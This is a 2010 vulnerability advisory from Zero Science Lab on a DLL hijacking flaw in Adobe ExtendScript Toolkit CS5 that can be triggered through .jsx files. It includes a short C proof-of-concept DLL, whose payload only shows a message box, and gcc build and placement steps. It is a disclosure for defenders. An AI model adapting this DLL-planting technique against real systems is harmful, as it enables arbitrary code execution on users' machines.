Title: Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit
Advisory ID: ZSL-2010-4952
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 26.08.2010
The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility included with Adobe® Creative Suite CS5 and other Adobe applications. The ESTK is used for creating, editing, and debugging JavaScript to be used for scripting Adobe applications.
Adobe ExtendScript Toolkit CS5 suffers from a dll hijacking vulnerability that enables the attacker to execute arbitrary code on a local level. The vulnerable extension is .jsx thru dwmapi.dll library.
Adobe Systems Inc. - <http://www.adobe.com>
CS5 v3.5.0.52 ExtendScript 4.1.23 ScriptUI 5.1.37
Microsoft Windows XP Professional SP3 (English)
N/A
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <http://www.exploit-db.com/exploits/14785>
[2] <http://packetstormsecurity.org/filedesc/adobeest_dll.txt.html>
[3] <http://securityreason.com/exploitalert/8780>
[4] <http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/>
[5] <http://www.exploit-db.com/dll-hijacking-vulnerable-applications/>
[6] <http://www.vupen.com/english/advisories/2010/2213>
[7] <http://osvdb.org/show/osvdb/67550>
[8] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3155>
[9] <http://www.securityfocus.com/bid/42749>
[26.08.2010] - Initial release
[27.08.2010] - Added reference [1], [2], [3], [4] and [5]
[28.08.2010] - Added reference [6] and [7]
[31.08.2010] - Added reference [8]
[13.11.2010] - Added reference [9]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>/*
Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit
Vendor: Adobe Systems Inc.
Product Web Page: http://www.adobe.com
Affected Version: CS5 v3.5.0.52 ExtendScript 4.1.23 ScriptUI 5.1.37
Summary: The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility
included with Adobe� Creative Suite CS5 and other Adobe applications.
The ESTK is used for creating, editing, and debugging JavaScript to be
used for scripting Adobe applications.
Desc: Adobe ExtendScript Toolkit CS5 suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local level. The
vulnerable extension is .jsx thru dwmapi.dll library.
----
gcc -shared -o dwmapi.dll adobeest.c
Compile and rename to dwmapi.dll, create a file test.jsx and put both files
in same dir and execute.
----
Tested on Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
25.08.2010
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}</windows.h></p></body></html>